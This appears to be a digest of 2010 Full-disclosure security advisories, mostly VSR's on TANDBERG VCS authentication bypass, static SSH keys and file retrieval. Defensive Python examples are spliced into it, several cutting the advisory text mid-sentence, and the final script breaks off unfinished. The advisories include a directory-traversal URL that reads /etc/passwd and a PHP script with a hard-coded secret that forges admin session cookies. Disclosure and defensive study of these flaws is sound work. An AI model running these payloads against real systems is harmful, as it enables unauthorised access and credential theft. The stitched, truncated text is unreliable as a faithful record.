[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Drivers32]
"VIDC.VMnc"=-

VI. VENDOR RESPONSE

VMware Inc. has released patches to address this issue. Information about downloadable vendor updates can be found by clicking on the URLs shown.

http://lists.vmware.com/pipermail/security-announce/2010/90.html

VII. CVE INFORMATION

The Common Vulnerabilities and Exposures (CVE) project has assigned the name CVE-2010-1564 to this issue. This is a candidate for inclusion in the CVE list (http://cve.mitre.org/), which standardizes names for security problems.

VIII. DISCLOSURE TIMELINE

08/25/2009 Initial Vendor Notification
08/25/2009 Initial Vendor Reply
04/09/2010 Coordinated Public Disclosure

IX. CREDIT

The discoverer of this vulnerability wishes to remain anonymous.

Get paid for vulnerability research
http://labs.idefense.com/methodology/vulnerability/vcp.php

Free tools, research and upcoming events
http://labs.idefense.com/

X. LEGAL NOTICES

Copyright © 2010 iDefense, Inc.

Permission is granted for the redistribution of this alert electronically. It may not be edited in any way without the express written consent of iDefense. If you wish to reprint the whole or any part of this alert in any other medium other than electronically, please e-mail customerserv...@idefense.com for permission.

Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information.
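The bug class in section II is a length mismatch: the decoder sizes its heap buffer from one field of the file (the stream's format header) and copies a byte count taken from another (the frame chunk). A parser that refuses any frame larger than the buffer the header implies cannot be driven into that copy. The code below is an added example, not iDefense's or VMware's code: it walks the RIFF/AVI container, derives the frame buffer size from the BITMAPINFOHEADER in the 'strf' chunk, and rejects the file at the first video frame whose declared size exceeds it. The AVI bytes it handles are constructed in memory, and frames are treated as raw bitmaps because the VMnc codec's own frame layout is not on the page.

```python
"""Reject AVI files whose video frames are larger than the header-derived buffer.

Added example for the advisory above; not iDefense's or VMware's code.
"""
import struct
from typing import Iterator, List, Tuple


def riff_chunks(data: bytes, start: int, end: int) -> Iterator[Tuple[bytes, bytes, int, int]]:
    """Yield (fourcc, list_type, body_start, body_end) for each chunk in [start, end).
    RIFF/LIST chunks carry their list type; other chunks yield b"" there."""
    pos = start
    while pos + 8 <= end:
        fourcc = data[pos:pos + 4]
        size = struct.unpack("<I", data[pos + 4:pos + 8])[0]
        body_start, body_end = pos + 8, pos + 8 + size
        if body_end > end:
            raise ValueError(f"chunk {fourcc!r} at {pos} overruns its parent")
        if fourcc in (b"RIFF", b"LIST"):
            yield fourcc, data[body_start:body_start + 4], body_start + 4, body_end
        else:
            yield fourcc, b"", body_start, body_end
        pos = body_end + (size & 1)          # chunk bodies are padded to even length


def frame_buffer_size(data: bytes, strf_start: int) -> int:
    """Bytes one raw frame needs, from the BITMAPINFOHEADER at the start of 'strf'."""
    _, width, height, _, bpp = struct.unpack("<IiiHH", data[strf_start:strf_start + 16])
    if width <= 0 or height == 0 or bpp not in (8, 16, 24, 32):
        raise ValueError("unsupported bitmap header")
    stride = ((width * bpp + 31) // 32) * 4          # rows are padded to 4 bytes
    return stride * abs(height)                      # negative height = top-down bitmap


def check_frames(data: bytes) -> List[Tuple[int, int]]:
    """Return (index, size) per video frame, or raise ValueError at the first frame
    whose declared size exceeds the buffer the stream header implies."""
    limit = None
    frames: List[Tuple[int, int]] = []

    def walk(start: int, end: int) -> None:
        nonlocal limit
        for fourcc, _, bs, be in riff_chunks(data, start, end):
            if fourcc in (b"RIFF", b"LIST"):
                walk(bs, be)
            elif fourcc == b"strf" and limit is None:   # first video stream's format
                limit = frame_buffer_size(data, bs)
            elif fourcc[2:] in (b"dc", b"db"):           # '##dc' compressed, '##db' raw
                if limit is None:
                    raise ValueError("frame chunk before the stream format header")
                if be - bs > limit:
                    raise ValueError(f"frame {len(frames)} declares {be - bs} bytes, "
                                     f"buffer is {limit}")
                frames.append((len(frames), be - bs))

    walk(0, len(data))
    return frames


# --- constructed sample files ------------------------------------------------
def _chunk(fourcc: bytes, body: bytes) -> bytes:
    return fourcc + struct.pack("<I", len(body)) + body + (b"\x00" if len(body) & 1 else b"")


def _list(ltype: bytes, *chunks: bytes) -> bytes:
    return _chunk(b"LIST", ltype + b"".join(chunks))


def build_avi(width: int, height: int, bpp: int, frame_sizes: List[int]) -> bytes:
    """Minimal AVI with one video stream and raw '00dc' frames of the given sizes."""
    strf = struct.pack("<IiiHHIIiiII", 40, width, height, 1, bpp, 0, 0, 0, 0, 0, 0)
    hdrl = _list(b"hdrl", _chunk(b"avih", b"\x00" * 56),
                 _list(b"strl", _chunk(b"strh", b"\x00" * 56), _chunk(b"strf", strf)))
    movi = _list(b"movi", *(_chunk(b"00dc", b"\xaa" * n) for n in frame_sizes))
    return _chunk(b"RIFF", b"AVI " + hdrl + movi)
```

The check is the one the vulnerable decoder lacked: both numbers come from the attacker, so the copy length must be validated against the allocation, not trusted independently. For a real codec the limit would come from the codec's own frame header rather than from a raw-bitmap calculation, but the shape of the check is the same.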
[Full-disclosure] [USN-920-1] Firefox 3.0 and Xulrunner vulnerabilities
=== Ubuntu Security Notice USN-920-1 April 09, 2010 firefox-3.0, xulrunner-1.9 vulnerabilities CVE-2010-0174, CVE-2010-0175, CVE-2010-0176, CVE-2010-0177, CVE-2010-0178, CVE-2010-0179 === A security issue affects the following Ubuntu releases: Ubuntu 8.04 LTS Ubuntu 8.10 Ubuntu 9.04 This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu. The problem can be corrected by upgrading your system to the following package versions: Ubuntu 8.04 LTS: firefox-3.0 3.0.19+nobinonly-0ubuntu0.8.04.1 xulrunner-1.9 1.9.0.19+nobinonly-0ubuntu0.8.04.1 Ubuntu 8.10: abrowser3.0.19+nobinonly-0ubuntu0.8.10.1 firefox-3.0 3.0.19+nobinonly-0ubuntu0.8.10.1 xulrunner-1.9 1.9.0.19+nobinonly-0ubuntu0.8.10.1 Ubuntu 9.04: abrowser3.0.19+nobinonly-0ubuntu0.9.04.1 firefox-3.0 3.0.19+nobinonly-0ubuntu0.9.04.1 xulrunner-1.9 1.9.0.19+nobinonly-0ubuntu0.9.04.1 After a standard system upgrade you need to restart Firefox and any applications that use Xulrunner to effect the necessary changes. Details follow: Martijn Wargers, Josh Soref, Jesse Ruderman, and Ehsan Akhgari discovered flaws in the browser engine of Firefox. If a user were tricked into viewing a malicious website, a remote attacker could cause a denial of service or possibly execute arbitrary code with the privileges of the user invoking the program. (CVE-2010-0174) It was discovered that Firefox could be made to access previously freed memory. If a user were tricked into viewing a malicious website, a remote attacker could cause a denial of service or possibly execute arbitrary code with the privileges of the user invoking the program. (CVE-2010-0175, CVE-2010-0176, CVE-2010-0177) Paul Stone discovered that Firefox could be made to change a mouse click into a drag and drop event. If the user could be tricked into performing this action twice on a crafted website, an attacker could execute arbitrary JavaScript with chrome privileges. 
(CVE-2010-0178) It was discovered that the XMLHttpRequestSpy module as used by the Firebug add-on could be used to escalate privileges within the browser. If the user had the Firebug add-on installed and were tricked into viewing a malicious website, an attacker could potentially run arbitrary JavaScript. (CVE-2010-0179) Updated packages for Ubuntu 8.04 LTS: Source archives: http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.0/firefox-3.0_3.0.19+nobinonly-0ubuntu0.8.04.1.diff.gz Size/MD5: 106784 17f50b50fa9740c6fcf82c1feb3cd2de http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.0/firefox-3.0_3.0.19+nobinonly-0ubuntu0.8.04.1.dsc Size/MD5: 2387 33644ec48d3ef7a34135f12bfc6d30ef http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.0/firefox-3.0_3.0.19+nobinonly.orig.tar.gz Size/MD5: 11605275 b1e129a58d29379376f04be1959b8268 http://security.ubuntu.com/ubuntu/pool/main/x/xulrunner-1.9/xulrunner-1.9_1.9.0.19+nobinonly-0ubuntu0.8.04.1.diff.gz Size/MD5:79855 2ce4812dc10be1191daa98476f468cb1 http://security.ubuntu.com/ubuntu/pool/main/x/xulrunner-1.9/xulrunner-1.9_1.9.0.19+nobinonly-0ubuntu0.8.04.1.dsc Size/MD5: 2438 4f71c33a06184499d8ff99b1efb78d66 http://security.ubuntu.com/ubuntu/pool/main/x/xulrunner-1.9/xulrunner-1.9_1.9.0.19+nobinonly.orig.tar.gz Size/MD5: 42005942 92a0017fe802a917e67dbf5d05216d6f Architecture independent packages: http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.0/firefox-dev_3.0.19+nobinonly-0ubuntu0.8.04.1_all.deb Size/MD5:66558 f8afcac074ad9969983db51e54f61c16 http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.0/firefox-gnome-support_3.0.19+nobinonly-0ubuntu0.8.04.1_all.deb Size/MD5:66568 378667968d1ed3f4345ba25a854930d4 http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.0/firefox-granparadiso-dev_3.0.19+nobinonly-0ubuntu0.8.04.1_all.deb Size/MD5:66534 145cc5ce4f031f08fb8515cce1ad9a05 http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.0/firefox-trunk-dev_3.0.19+nobinonly-0ubuntu0.8.04.1_all.deb Size/MD5:66520 
e681baa33f03eb2e8cf35b542cb36a09 http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.0/firefox_3.0.19+nobinonly-0ubuntu0.8.04.1_all.deb Size/MD5:66676 04ee6cea1699facb138145aed452c8c9 http://security.ubuntu.com/ubuntu/pool/universe/f/firefox-3.0/firefox-3.0-dom-inspector_3.0.19+nobinonly-0ubuntu0.8.04.1_all.deb Size/MD5:66578 574947764c813c2ce224ac3a85b2663f http://security.ubuntu.com/ubuntu/pool/universe/f/firefox-3.0/firefox-3.0-venkman_3.0.19+nobinonly-0ubuntu0.8.04.1_all.deb Size/MD5:66526 56d1455d499d3088331019dd795f68dd http://security.ubuntu.com/
Re: [Full-disclosure] Compliance Is Wasted Money, Study Finds
On Wed, Apr 07, 2010 at 03:52:00PM -0600, Digital X spake thusly:
> Having just gone through a PCI audit I can safely say a few things:

Not the fault of PCI. Perhaps you should consider a better auditor.

--
Tracy Reed
http://tracyreed.org
[Full-disclosure] CVE-2009-4510: TANDBERG VCS Static SSH Host Keys
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Virtual Security Research, LLC. http://www.vsecurity.com/ Security Advisory - -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Advisory Name: TANDBERG Video Communication Server Static SSH Host Keys Release Date: 2010-04-09 Application: Video Communication Server (VCS) Versions: x4.3.0, x4.2.1, and possibly earlier Severity: High Discovered by: Jon Hart Advisory by: Timothy D. Morgan Vendor Status: Firmware version x5.1.1 released [2]. CVE Candidate: CVE-2009-4510 Reference: http://www.vsecurity.com/resources/advisory/20100409-2/ - -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Product Description - --- - From [1]: "The Video Communication Server (VCS) is an integral part of the TANDBERG Total Solution and is the center of the video communications network, connecting the benefits of video conferencing and telepresence to other communications environments including unified communications and IP Telephony networks." Vulnerability Overview - -- On December 2nd, VSR identified a SSH service authentication weakness vulnerability in the TANDBERG's Video Communication Server. This issue would allow an attacker with privileged network access to conduct server impersonation and man-in-the-middle attacks on administrator SSH sessions. Successful attacks could yield shell access to vulnerable appliances. Product Background - -- The TANDBERG Video Communication Server is a Linux-based appliance which supports the interoperation of a plethora of video and voice communications devices. The VCS provides several system shell accounts accessible via the SSH protocol. 
Vulnerability Details - - The TANDBERG VCS appliance is deployed by default with a DSA ssh key pair stored in files: /tandberg/sshkeys/ssh_host_dsa_key /tandberg/sshkeys/ssh_host_dsa_key.pub In tested versions of the firmware, this default key has a fingerprint of: 49:53:bf:94:2a:d7:0c:3f:48:29:f7:5b:5d:de:89:b8 No new key is generated upon installation. In addition, this default key would overwrite any SSH server keys, if installed by security-conscious administrators previously, during a firmware upgrade. Due to the public nature of this key (see firmware downloads [2]) an attacker would be able to conduct server impersonation and man-in-the-middle attacks on SSH connections directed at any TANDBERG VCS device. A successful exploit would most likely yield an attacker shell access to the device with privileges of the victim client. Versions Affected - - VSR has observed this vulnerability in version x4.2.1. Based on preliminary analysis of configuration files and scripts [2], versions x4.3.0 and x5.0 also appear to be vulnerable. Earlier versions have not been tested. Vendor Response - --- The following timeline details TANDBERG's response to the reported issue: 2009-12-09Preliminary notice to TANDBERG. TANDBERG responded immediately. 2009-12-22VSR provided TANDBERG a draft advisory. 2009-12-28TANDBERG provided VSR with a beta version of the x5.0 firmware, but this did not appear to correct the issue. 2010-01-22TANDBERG provided VSR with a beta version of the x5.1 firmware, but this did not appear to correct the issue for existing installations, since old vulnerable keys would be preserved. 2010-01-28TANDBERG explained that changing SSH keys automatically on administrators may cause backward compatibility problems. Therefore, TANDBERG decided to preserve old keys even when upgrading a system which contains a vulnerable key. Administrators will instead be warned in the web console that a vulnerable key is in use and will be expected to update host keys manually. 
2010-03-26  TANDBERG provided VSR with a release candidate firmware for
            version x5.1.1.
2010-04-07  TANDBERG VCS firmware version x5.1.1 released [2].
2010-04-09  VSR advisory released.

Recommendation
--------------
Immediately replace the current SSH host key with a new one. This may be
accomplished through one of several methods. One approach is to log in to
the device locally and use the ssh-keygen utility to replace the keys stored
in /tandberg/sshkeys/. Consult TANDBERG documentation for other methods.

After replacing the SSH host keys, it is recommended that the VCS firmware be
upgraded to x5.1.1 as soon as possible.

NOTE: Upgrading or downgrading to versions prior to x5.1.1 will cause any
custom SSH host keys to be overwritten. Version x5.1.1 and later should
preserve any custom host keys previously installed. As a precaution, after
upgradin
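Because the shipped key's fingerprint is published above, an administrator can inventory which VCS appliances (and which entries in operators' known_hosts files) still present it. The following audit script is an added example and is not part of the VSR advisory or of TANDBERG's firmware; it computes the classic OpenSSH MD5 fingerprint of each host key in `ssh-keyscan`/known_hosts format and flags matches against the advisory's fingerprint. The sample key blobs in SAMPLE_KEYSCAN are constructed for the example and are not real VCS keys.

```python
"""Audit SSH host keys for the static TANDBERG VCS DSA host key.

Added example (not VSR's or TANDBERG's code). Input is the output of
`ssh-keyscan -t dsa <host> ...` or lines from a known_hosts file:
"<host> <keytype> <base64 blob> [comment]". Every host whose key matches
the blocklisted fingerprint should have its host key replaced before the
host is trusted again, since the same key is present on every unpatched
appliance and can therefore be used to impersonate any of them.
"""
import base64
import hashlib

# Fingerprint of the DSA host key shipped with the affected firmware,
# as published in the advisory above.
STATIC_VCS_DSA_FINGERPRINT = "49:53:bf:94:2a:d7:0c:3f:48:29:f7:5b:5d:de:89:b8"

# Constructed sample input for the example (not real VCS keys), in the
# format ssh-keyscan prints: a "#" banner line, then one key per host.
SAMPLE_KEYSCAN = [
    "# vcs1.example.com:22 SSH-2.0-OpenSSH_4.3",
    "vcs1.example.com ssh-dss YWJj",
    "vcs2.example.com ssh-dss YQ==",
]


def fingerprint_md5(pubkey_b64: str) -> str:
    """Return the classic OpenSSH MD5 fingerprint (aa:bb:...) of a base64 key blob.

    This is the value `ssh-keygen -l -E md5` prints: MD5 over the decoded
    key blob, rendered as colon-separated hex bytes. validate=True makes
    junk that is not base64 raise instead of silently decoding to nothing.
    """
    blob = base64.b64decode(pubkey_b64, validate=True)
    digest = hashlib.md5(blob).hexdigest()
    return ":".join(digest[i:i + 2] for i in range(0, len(digest), 2))


def audit_keyscan_lines(lines, blocklist=(STATIC_VCS_DSA_FINGERPRINT,)):
    """Parse keyscan/known_hosts lines; report which hosts use a blocklisted key.

    Returns a list of (host, keytype, fingerprint, flagged) tuples, one per
    parsable line. Banner/comment lines (#), blank lines, lines with too few
    fields and lines whose blob is not valid base64 are skipped, so a noisy
    input file does not abort the whole audit.
    """
    wanted = {fp.lower() for fp in blocklist}
    results = []
    for raw in lines:
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split()
        if len(parts) < 3:
            continue
        host, keytype, blob = parts[0], parts[1], parts[2]
        try:
            fp = fingerprint_md5(blob)
        except ValueError:  # binascii.Error is a ValueError subclass
            continue
        results.append((host, keytype, fp, fp in wanted))
    return results


def flagged_hosts(lines, blocklist=(STATIC_VCS_DSA_FINGERPRINT,)):
    """Just the host names that still present a blocklisted host key."""
    return [host for host, _, _, hit in audit_keyscan_lines(lines, blocklist) if hit]


if __name__ == "__main__":
    import sys
    # Typical use:  ssh-keyscan -t dsa vcs1 vcs2 | python audit_vcs_hostkeys.py
    # With no piped input the constructed sample is audited instead.
    source = SAMPLE_KEYSCAN if sys.stdin.isatty() else sys.stdin
    for host, keytype, fp, hit in audit_keyscan_lines(source):
        status = "STATIC VCS KEY - REPLACE" if hit else "ok"
        print(f"{host:30} {keytype:8} {fp}  {status}")
```

Run it against the real fleet by piping `ssh-keyscan -t dsa` output in; a hit means the device's host key must be regenerated (see the Recommendation above) and the stale entry removed from every client's known_hosts so the replacement key is learned fresh.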
[Full-disclosure] CVE-2009-4511: TANDBERG VCS Arbitrary File Retrieval
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

                       Virtual Security Research, LLC.
                        http://www.vsecurity.com/
                            Security Advisory

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
 Advisory Name: TANDBERG Video Communication Server Arbitrary File Retrieval
  Release Date: 2010-04-09
   Application: Video Communication Server (VCS)
      Versions: x4.3.0, x4.2.1, and possibly earlier
      Severity: Medium
 Discovered by: Jon Hart
   Advisory by: Timothy D. Morgan
 Vendor Status: Firmware update released [2]
 CVE Candidate: CVE-2009-4511
     Reference: http://www.vsecurity.com/resources/advisory/20100409-3/
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

Product Description
-------------------
From [1]:
"The Video Communication Server (VCS) is an integral part of the TANDBERG
Total Solution and is the center of the video communications network,
connecting the benefits of video conferencing and telepresence to other
communications environments including unified communications and IP
Telephony networks."

Vulnerability Overview
----------------------
On December 3rd, VSR identified a directory traversal and file retrieval
vulnerability in TANDBERG's Video Communication Server. This issue would
allow an authenticated attacker (who has access as an administrator or less
privileged user on the web administration interface) to retrieve files from
the filesystem which are readable by the "nobody" system user.

Product Background
------------------
The TANDBERG Video Communication Server is a Linux-based appliance which
supports the interoperation of a plethora of video and voice communications
devices. The VCS provides a web-based management interface implemented in
PHP which allows administrators to perform a wide variety of actions,
including configuration of the device, management of user accounts and
firmware updates, along with a number of other items.
Vulnerability Details
---------------------
The TANDBERG VCS web management interface provides two nearly identical
scripts at the URLs:

  https://vulnerable.example.com/helppage.php
  https://vulnerable.example.com/user/helppage.php

These help pages accept a "page" parameter in the URL which can be used to
retrieve nearly arbitrary files from the filesystem. The relevant source
code for these pages is as follows:

  // The following is Copyright (C) 2009 TANDBERG
  // ...
  // Grab the content before we write anything: we'll need it for the
  // title tag in the <head>
  // Dig out the page title, from the <title> tag,
  // then remove any surround in the page as we add our own...
  $filename = $this->helpPagePath . $_GET['page'] . $this->helpPageSuffix;
  if (! file_exists($filename)) {
      $helpHTML = "There is no help available for the " . $_GET['page'] . " page";
      $pageTitle = $_GET['page'];
  } else {
      $helpHTML = file_get_contents($filename);
      ...
  echo "\n\n";
  echo $helpHTML;
  echo "\n";
  ...
  // end of excerpt //

Here, the final path string ($filename) that is loaded and displayed to the
user is built by prepending a directory and appending a file extension to
the unchecked parameter. Using simple directory traversal sequences ("../")
it is possible to reach any directory on the filesystem. Using a trailing
NUL byte encoded in the URL (%00) it is also possible to truncate the file
path and thereby eliminate the file extension. For instance, the following
URL retrieves the /etc/passwd file:

  https://vulnerable.example.com/helppage.php?page=../../../../etc/passwd%00

During testing, it was found that the x4.2.1 firmware runs the web server as
the "nobody" user, which somewhat limits the amount of sensitive information
that may be obtained. However, since shadowed passwords were not configured,
it was possible to retrieve all local system users' password hashes from
/etc/passwd. Additional password hashes are available in
/tandberg/persistent/etc/digest.

Versions Affected
-----------------
VSR has successfully exploited this issue in firmware version x4.2.1.
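The defect above is the unchecked concatenation prefix + user input + suffix. The following is an added example, not TANDBERG's code and not its x5.1 fix, that renders the same lookup in Python with the unchecked version beside a hardened one, so the two failure modes in the text (".." traversal and NUL truncation of the extension, which the web server hands to the script already URL-decoded) can be tested directly. HELP_DIR, HELP_SUFFIX and the page-name character set are assumptions; the advisory does not give the real helpPagePath or helpPageSuffix values.

```python
"""Help-page path resolution: unchecked concatenation beside a hardened lookup.

Added example (not TANDBERG's code). The hardened function layers three
checks so that loosening any one of them later does not silently reopen
the traversal: a whitelist on the page name, a containment check on the
normalised path, and a check that the expected suffix survived.
"""
import posixpath
import re

HELP_DIR = "/var/www/help"   # assumption: the real helpPagePath is not in the advisory
HELP_SUFFIX = ".html"        # assumption: the real helpPageSuffix is not in the advisory

# Layer 1: a help page name is an opaque identifier, so only a tight
# character set is allowed. '/', '.', and NUL are all outside it.
PAGE_NAME_RE = re.compile(r"[A-Za-z0-9_-]{1,64}")


def vulnerable_help_path(page: str) -> str:
    """Mirror of the original lookup: prefix + user input + suffix, no checks.

    The string it returns is exactly what a C-level open() would receive;
    a NUL inside `page` ends the C string early, dropping the suffix.
    """
    return HELP_DIR + "/" + page + HELP_SUFFIX


def safe_help_path(page: str):
    """Return the help file path for `page`, or None if the request is rejected."""
    # Layer 1: whitelist (also rejects an embedded NUL, checked explicitly
    # so the intent is visible even if the regex is edited).
    if "\x00" in page or not PAGE_NAME_RE.fullmatch(page):
        return None
    # Layer 2: normalise and require the result to stay under HELP_DIR.
    candidate = posixpath.normpath(posixpath.join(HELP_DIR, page + HELP_SUFFIX))
    root = HELP_DIR.rstrip("/") + "/"
    if not candidate.startswith(root):
        return None
    # Layer 3: the file we open must still carry the intended extension.
    if not candidate.endswith(HELP_SUFFIX):
        return None
    return candidate


def classify(page: str) -> str:
    """Reason string for logging/alerting on a rejected request, or 'ok'."""
    if "\x00" in page:
        return "rejected: NUL byte (extension truncation attempt)"
    if ".." in page or "/" in page:
        return "rejected: traversal characters"
    if not PAGE_NAME_RE.fullmatch(page):
        return "rejected: disallowed characters"
    return "ok"


if __name__ == "__main__":
    # Constructed requests: one legitimate, one traversal, one traversal + NUL.
    for req in ("overview", "../../../../etc/passwd", "../../../../etc/passwd\x00"):
        print(repr(req), "->", vulnerable_help_path(req), "|", safe_help_path(req), "|", classify(req))
```

The classify() strings are what a request log or WAF rule would record; the NUL case is worth its own reason because it is the signature of an attempt to defeat a suffix-based check rather than plain traversal.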
Based on preliminary source code analysis [2], versions x4.3.0 and x5.0 also
appear to be vulnerable. Earlier versions have not been tested.

Vendor Response
---------------
The following timeline details TANDBERG's response to the reported issue:

2009-12-09  Preliminary notice to TANDBERG. TANDBERG responded immediately.
2009-12-22  VSR provided TANDBERG a draft advisory.
2009-12-28  TANDBERG provided VSR with a beta version of the x5.0 firmware,
            but this did not appear to correct the issue (based on PHP code
            analysis alone).
2010-01-22  TANDBERG provided VSR with a beta version of the x5.1 firmware
            for testing which appeared to correct the vulnerability.
2010-03-26  TANDBERG provided VSR
[Full-disclosure] CVE-2009-4509: TANDBERG VCS Authentication Bypass
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

                       Virtual Security Research, LLC.
                        http://www.vsecurity.com/
                            Security Advisory

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
 Advisory Name: TANDBERG Video Communication Server Authentication Bypass
  Release Date: 2010-04-09
   Application: Video Communication Server (VCS)
      Versions: x4.2.1 and possibly earlier
      Severity: Critical
 Discovered by: Jon Hart and Timothy D. Morgan
   Advisory by: Timothy D. Morgan
 Vendor Status: Update released (without security advisory) on October 9, 2009
 CVE Candidate: CVE-2009-4509
     Reference: http://www.vsecurity.com/resources/advisory/20100409-1/
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

Product Description
-------------------
From [1]:
"The Video Communication Server (VCS) is an integral part of the TANDBERG
Total Solution and is the center of the video communications network,
connecting the benefits of video conferencing and telepresence to other
communications environments including unified communications and IP
Telephony networks."

Vulnerability Overview
----------------------
On December 2nd, VSR identified an authentication bypass vulnerability in
TANDBERG's Video Communication Server, firmware version x4.2.1. This
vulnerability allows for the complete bypass of authentication in the
administrative web console. Since this web interface can be used to execute
arbitrary code on the appliance as root (via software updates), the severity
is considered critical.

Product Background
------------------
The TANDBERG Video Communication Server is a Linux-based appliance which
supports the interoperation of a plethora of video and voice communications
devices. The VCS provides a web-based management interface implemented in
PHP which allows administrators to perform a wide variety of actions,
including configuration of the device, management of user accounts and
firmware updates, along with a number of other items.
Vulnerability Details
---------------------
The TANDBERG VCS web management interface utilizes custom cookies for the
purpose of session management. In version x4.2.1 of the appliance firmware
(and possibly earlier versions), it is possible to forge session cookies
with relatively little knowledge of the appliance's configuration. The
vulnerability lies in the files located at the following paths:

  /tandberg/web/lib/secure.php
  /tandberg/web/user/lib/secure.php

Routines in these files generate user session cookies in roughly the
following way:

  SECRET = SERVER_ADDRESS + STATIC_VALUE
  HASH   = md5(USERNAME + SECRET + CLIENT_ADDRESS + CURRENT_TIME)
  COOKIE = USERNAME + ACCESS_RIGHTS + CLIENT_ADDRESS + CURRENT_TIME + HASH

In the above pseudocode, SERVER_ADDRESS represents the VCS system's IP
address, STATIC_VALUE represents a fixed string which is hard-coded into the
application source, USERNAME is the authenticated user name, CLIENT_ADDRESS
is the IP address of the user's system, CURRENT_TIME is a simple UNIX time
stamp, and ACCESS_RIGHTS is an integer denoting the level of access assigned
to the user.

Note that none of the information above is difficult to guess. Any owner of
a TANDBERG VCS would have access to the STATIC_VALUE (and in fact, this value
is contained in the firmware updates [2]). All TANDBERG appliances have a
default user name of "admin" which has full privileges. Therefore, it is
possible with a simple PHP script to forge new cookies and access the
administrative interface:

  // NOTE: Portions of the following code are Copyright (C) 2009 TANDBERG //
  function objectToCookie($obj)
  {
      $cookie = serialize($obj);
      $cookie = gzcompress($cookie);
      $cookie = base64_encode($cookie);
      return $cookie;
  }

  function genCookie($server_addr, $remote_addr)
  {
      $user_name = "root";
      $secret = $server_addr . "139EF012B6A714A3BE0A867616C7F8";
      $time = time() + 24*60*60;
      $id_hash = md5($user_name . $secret . $remote_addr . $time);
      $access = 1; // ReadWrite
      $login_cookie = array(
          "user_name" => $user_name,
          "access"    => $access,
          "id_hash"   => $id_hash,
          "ip"        => $remote_addr,
          "time"      => $time
      );
      return objectToCookie($login_cookie);
  }

  print "Cookie: tandberg_login=" . urlencode(genCookie("{{SERVER_IP}}", "{{CLIENT_IP}}")) . "\n";
  // end of script //

TANDBERG released firmware version x4.3.0, which corrects this issue, on
October 9, 2009 (prior to discovery of the vulnerability by VSR). The
release notes [3] for this updated version contain a description of the
issue: "
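The root cause above is that the integrity value is an unkeyed MD5 over fields an attacker can reconstruct, and that ACCESS_RIGHTS is not even covered by it. The following is an added example, not TANDBERG's code and not the x4.3.0 fix, showing the construction a defender would expect for the same cookie fields: a per-installation random secret that never leaves the device, an HMAC-SHA256 over every field, constant-time verification, and expiry and client-address checks on the authenticated fields. The field names follow the advisory's pseudocode; the secret storage, lifetime and helper names are assumptions.

```python
"""Session cookies with a keyed MAC instead of a guessable hash.

Added example (not TANDBERG's code). Every field that influences
authorisation (user_name, access, ip, time) is inside the MAC'd payload,
and the MAC key is random per installation rather than derived from the
server address plus a constant shipped in the firmware.
"""
import base64
import hashlib
import hmac
import json
import secrets
import time

# Assumption: generated once at install/first boot and stored outside the
# web root, readable only by the web server user. Constructed here so the
# example runs stand-alone.
INSTALL_SECRET = secrets.token_bytes(32)

SESSION_LIFETIME = 24 * 60 * 60  # seconds; assumption for the example


def _mac(payload: bytes, secret: bytes) -> bytes:
    """HMAC-SHA256 over the serialised payload, hex-encoded."""
    return hmac.new(secret, payload, hashlib.sha256).hexdigest().encode()


def _serialise(fields: dict) -> bytes:
    # Canonical JSON so the same fields always produce the same bytes.
    return json.dumps(fields, sort_keys=True, separators=(",", ":")).encode()


def make_cookie(user_name: str, access: int, client_ip: str,
                secret: bytes = INSTALL_SECRET, now=None) -> str:
    """Build a cookie whose every field is covered by the MAC."""
    issued = int(time.time()) if now is None else now
    payload = _serialise({"user_name": user_name, "access": access,
                          "ip": client_ip, "time": issued})
    return base64.urlsafe_b64encode(payload + b"." + _mac(payload, secret)).decode()


def verify_cookie(cookie: str, client_ip: str,
                  secret: bytes = INSTALL_SECRET, now=None):
    """Return the session fields if the cookie is authentic and current, else None."""
    try:
        token = base64.urlsafe_b64decode(cookie.encode())
        payload, _, mac = token.rpartition(b".")  # MAC is hex, so it has no '.'
        fields = json.loads(payload)
    except (ValueError, TypeError):
        return None
    if not isinstance(fields, dict):
        return None
    # Check the MAC first, in constant time: a forged or edited cookie
    # (changed access level, user, ip or time) fails here.
    if not hmac.compare_digest(mac, _mac(payload, secret)):
        return None
    issued = fields.get("time")
    if not isinstance(issued, int):
        return None
    current = int(time.time()) if now is None else now
    if fields.get("ip") != client_ip or not (0 <= current - issued <= SESSION_LIFETIME):
        return None
    return fields


def unsigned_rewrite(cookie: str, field: str, value) -> str:
    """Edit one payload field while keeping the old MAC; used to show that
    verify_cookie() rejects the result (a tamper-detection check)."""
    token = base64.urlsafe_b64decode(cookie.encode())
    payload, _, mac = token.rpartition(b".")
    fields = json.loads(payload)
    fields[field] = value
    return base64.urlsafe_b64encode(_serialise(fields) + b"." + mac).decode()


if __name__ == "__main__":
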